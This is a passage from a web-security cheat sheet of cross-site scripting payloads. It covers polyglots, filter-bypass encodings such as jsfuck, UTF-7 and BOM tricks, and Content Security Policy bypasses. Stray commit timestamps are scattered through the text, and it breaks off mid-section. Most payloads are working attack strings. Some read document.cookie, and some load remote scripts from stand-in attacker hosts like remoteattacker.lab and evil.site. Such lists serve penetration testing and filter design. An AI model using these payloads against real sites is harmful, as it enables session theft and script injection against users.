Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg)
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2018-02-23 12:48:51 +00:00
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
```
2018-08-12 21:30:22 +00:00
2018-02-23 12:48:51 +00:00
![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large)
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2018-02-23 12:48:51 +00:00
<svg%0Ao%00nload=%09((pro\u006dpt))()//
```
Polyglot XSS - from [@filedescriptor's Polyglot Challenge](http://polyglot.innerht.ml)
```javascript
# by crlf
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
# by europa
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>
# by EdOverflow
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>
# by h1/ragnar
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
```
Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/)
```javascript
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
```
2016-10-19 16:39:07 +00:00
## Filter Bypass and exotic payloads
2016-10-20 23:12:00 +00:00
### Bypass case sensitive
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2016-11-11 09:03:35 +00:00
<sCrIpt>alert(1)</ScRipt>
```
### Bypass tag blacklist
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
<script x>
<script x>alert('XSS')<script y>
```
### Bypass word blacklist with code evaluation
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
```
2018-06-27 18:00:17 +00:00
2020-09-05 08:36:58 +00:00
### Bypass with incomplete html tag
Works on IE/Firefox/Chrome/Safari
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
<img src='1' onerror='alert(0)' <
```
### Bypass quotes for string
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2016-10-20 23:12:00 +00:00
String.fromCharCode(88,83,83)
```
### Bypass quotes in script tag
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2017-01-21 14:38:47 +00:00
http://localhost/bla.php?test=</script><script>alert(1)</script>
<html>
<script>
<?php echo 'foo="text '.$_GET['test'].'";';`?>
</script>
</html>
```
### Bypass quotes in mousedown event
You can bypass a single quote with &#39; in an on mousedown event handler
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
```
### Bypass dot filter
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
<script>window['alert'](document['domain'])</script>
2016-11-11 09:03:35 +00:00
```
2019-08-28 17:56:55 +00:00
Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
http://www.geektools.com/cgi-bin/ipconv.cgi
2021-11-10 15:38:02 +00:00
```javascript
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
```
2021-11-10 15:40:40 +00:00
Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==`
2021-11-10 15:38:02 +00:00
### Bypass parenthesis for string
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2016-10-24 17:15:10 +00:00
alert`1`
2018-08-13 11:07:37 +00:00
setTimeout`alert\u0028document.domain\u0029`;
2016-10-24 17:15:10 +00:00
```
2016-10-20 23:12:00 +00:00
### Bypass parenthesis and semi colon
```javascript
// From @garethheyes
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>
2020-09-05 08:36:58 +00:00
// From @terjanq
<script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script>
// From @cgvwzq
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>
```
### Bypass onxxxx= blacklist
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>
// Bypass onxxx= filter with a null byte/vertical tab
2016-11-11 09:03:35 +00:00
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />
2018-08-12 21:30:22 +00:00
2020-09-05 08:36:58 +00:00
// Bypass onxxx= filter with a '/'
2016-11-11 09:03:35 +00:00
<img src='1' onerror/=alert(0) />
```
### Bypass space filter
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
// Bypass space filter with "/"
2016-11-11 09:03:35 +00:00
<img/src='1'/onerror=alert(0)>
// Bypass space filter with 0x0c/^L
2018-03-23 12:53:53 +00:00
<svg onload = alert(1) >
$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al
00000010: 6572 7428 3129 0c3e 0a ert(1).>.
```
2020-09-05 08:36:58 +00:00
### Bypass email filter
([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate))
```javascript
"><svg/onload=confirm(1)>"@x.y
```
### Bypass document blacklist
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
2022-04-09 10:55:21 +00:00
window["doc"+"ument"]
```
2017-01-07 19:51:47 +00:00
### Bypass document.cookie blacklist
This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements.
```
window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);});
```
### Bypass using javascript inside a string
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2017-01-07 19:51:47 +00:00
<script>
foo="text </script><script>alert(1)</script>";
</script>
```
### Bypass using an alternate way to redirect
2018-08-12 21:30:22 +00:00
```javascript
location="http://google.com"
document.location = "http://google.com"
document.location.href="http://google.com"
window.location.assign("http://google.com")
window['location']['href']="http://google.com"
```
### Bypass using an alternate way to execute an alert
From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet.
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2018-02-23 12:48:51 +00:00
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
2017-08-07 15:52:36 +00:00
2018-02-23 12:48:51 +00:00
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
2016-11-11 09:03:35 +00:00
```
From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables
The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**.
```javascript
c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; }
// 5
```
Then calling alert is :
```javascript
Object.keys(self)[5]
// "alert"
self[Object.keys(self)[5]]("1") // alert("1")
```
2020-09-05 08:36:58 +00:00
We can find "alert" with a regular expression like ^a[rel]+t$ :
```javascript
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a()
// then you can use a() with Object.keys
self[Object.keys(self)[a()]]("1") // alert("1")
```
2020-09-05 08:36:58 +00:00
Oneliner:
```javascript
a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")
```
From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet.
2018-12-29 12:05:29 +00:00
```javascript
prompt`${document.domain}`
document.location='java\tscript:alert(1)'
document.location='java\rscript:alert(1)'
document.location='java\tscript:alert(1)'
```
From [@404death](https://twitter.com/404death/status/1011860096685502464) tweet.
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
constructor.constructor("aler"+"t(3)")();
[].filter.constructor('ale'+'rt(4)')();
top["al"+"ert"](5);
top[8680439..toString(30)](7);
top[/al/.source+/ert/.source](8);
top['al\x65rt'](9);
open('java'+'script:ale'+'rt(11)');
location='javascript:ale'+'rt(12)';
2018-08-13 11:07:37 +00:00
setTimeout`alert\u0028document.domain\u0029`;
2018-06-27 18:00:17 +00:00
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
2017-01-21 14:38:47 +00:00
```
2018-06-27 18:00:17 +00:00
Bypass using an alternate way to trigger an alert
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2017-01-21 14:38:47 +00:00
var i = document.createElement("iframe");
i.onload = function(){
i.contentWindow.alert(1);
}
document.appendChild(i);
// Bypassed security
XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
var proxy = obj[name];
obj[name] = function () {
2018-08-13 10:01:13 +00:00
if (exec_original) {
return proxy.apply(this, arguments);
}
2017-01-21 14:38:47 +00:00
};
XSSObject.lockdown(obj, name);
2018-08-13 10:01:13 +00:00
};
2017-01-21 14:38:47 +00:00
XSSObject.proxy(window, 'alert', 'window.alert', false);
```
2020-09-05 08:36:58 +00:00
### Bypass ">" using nothing
You don't need to close your tags.
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
<svg onload=alert(1)//
```
2017-01-21 14:38:47 +00:00
### Bypass "<" and ">" using and
Unicode Character U+FF1C and U+FF1E
2020-06-17 07:12:26 +00:00
```javascript
script/src=//evil.site/poc.js
2020-06-17 07:12:26 +00:00
```
### Bypass ";" using another character
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2016-12-20 18:46:06 +00:00
'te' * alert('*') * 'xt';
'te' / alert('/') / 'xt';
'te' % alert('%') % 'xt';
'te' - alert('-') - 'xt';
'te' + alert('+') + 'xt';
'te' ^ alert('^') ^ 'xt';
'te' > alert('>') > 'xt';
'te' < alert('<') < 'xt';
'te' == alert('==') == 'xt';
'te' & alert('&') & 'xt';
'te' , alert(',') , 'xt';
'te' | alert('|') | 'xt';
'te' ? alert('ifelsesh') : 'xt';
'te' in alert('in') in 'xt';
'te' instanceof alert('instanceof') instanceof 'xt';
```
### Bypass using HTML encoding
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
%26%2397;lert(1)
2019-09-26 18:41:01 +00:00
&#97;&#108;&#101;&#114;&#116;
></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
```
2023-05-31 12:18:25 +00:00
### Bypass using Katakana
Using the [Katakana](https://github.com/aemkei/katakana.js) library.
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
```
2020-12-17 07:56:58 +00:00
### Bypass using Cuneiform
```javascript
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
```
### Bypass using Lontara
```javascript
ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()
```
More alphabets on http://aem1k.com/aurebesh.js/#
### Bypass using ECMAScript6
```html
<script>alert&DiacriticalGrave;1&DiacriticalGrave;</script>
```
### Bypass using Octal encoding
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
```
### Bypass using Unicode
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2016-10-19 16:39:07 +00:00
Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was
transformed into U+003C LESS­THAN SIGN (<)
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')
E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/
%EF%BC%9E becomes >
%EF%BC%9C becomes <
2016-11-11 09:03:35 +00:00
```
2016-10-20 23:12:00 +00:00
Bypass using Unicode converted to uppercase
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2017-01-21 14:38:47 +00:00
İ (%c4%b0).toLowerCase() => i
ı (%c4%b1).toUpperCase() => I
ſ (%c5%bf) .toUpperCase() => S
(%E2%84%AA).toLowerCase() => k
<ſvg onload=... > become <SVG ONLOAD=...>
2017-01-21 14:38:47 +00:00
<ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=>
```
### Bypass using UTF-7
```javascript
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
```
### Bypass using UTF-8
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
2016-10-20 23:12:00 +00:00
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
" = %CA%BA
' = %CA%B9
```
### Bypass using UTF-16be
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```javascript
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
```
### Bypass using UTF-32
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```js
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
```
### Bypass using BOM
Byte Order Mark (The page must begin with the BOM character.)
BOM character allows you to override charset of the page
2018-08-12 21:30:22 +00:00
2018-06-27 18:00:17 +00:00
```js
BOM Character for UTF-16 Encoding:
Big Endian : 0xFE 0xFF
Little Endian : 0xFF 0xFE
XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E
BOM Character for UTF-32 Encoding:
Big Endian : 0x00 0x00 0xFE 0xFF
Little Endian : 0xFF 0xFE 0x00 0x00
XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
```
2020-09-05 08:36:58 +00:00
### Bypass using weird encoding or native interpretation
2018-08-12 21:30:22 +00:00
2016-10-20 23:12:00 +00:00
```javascript
2016-11-11 09:03:35 +00:00
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
2016-10-20 23:12:00 +00:00
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
2016-10-19 16:39:07 +00:00
```
### Bypass using jsfuck
Bypass using [jsfuck](http://www.jsfuck.com/)
```javascript
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
```
2018-09-01 13:36:33 +00:00
## CSP Bypass
2020-05-10 08:32:51 +00:00
Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Googles CSP Evaluator to bypass CSP](https://websecblog.com/vulns/google-csp-evaluator/)
2018-09-01 13:36:33 +00:00
### Bypass CSP using JSONP
**Requirements**:
* CSP: `script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';`
**Payload**:
Use a callback function from a whitelisted source listed in the CSP.
* Google Search: `//google.com/complete/search?client=chrome&jsonp=alert(1);`
* Google Account: `https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)`
* Google Translate: `https://translate.googleapis.com/$discovery/rest?version=v3&callback=alert();`
* Youtube: `https://www.youtube.com/oembed?callback=alert;`
* [Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
* [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)
2018-09-01 13:36:33 +00:00
```js
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
```
### Bypass CSP default-src
2018-09-01 13:36:33 +00:00
**Requirements**:
* CSP like `Content-Security-Policy: default-src 'self' 'unsafe-inline';`,
**Payload**:
`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;`
2018-09-01 13:36:33 +00:00
```js
script=document.createElement('script');
script.src='//remoteattacker.lab/csp.js';
2018-09-01 13:36:33 +00:00
window.frames[0].document.head.appendChild(script);
```
Source: [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)
### Bypass CSP inline eval
**Requirements**:
* CSP `inline` or `eval`
**Payload**:
2018-09-01 13:36:33 +00:00
```js
2020-08-09 10:15:56 +00:00
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
2018-09-01 13:36:33 +00:00
```
Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
### Bypass CSP script-src self
**Requirements**:
2018-09-06 18:28:30 +00:00
* CSP like `script-src self`
**Payload**:
2018-09-06 18:28:30 +00:00
```js
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
```
Source: [@akita_zen](https://twitter.com/akita_zen)
### Bypass CSP script-src data
**Requirements**:
* CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src).
**Payload**:
```javascript
<script src="data:,alert(1)">/</script>
```
Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
### Bypass CSP unsafe-inline
**Requirements**:
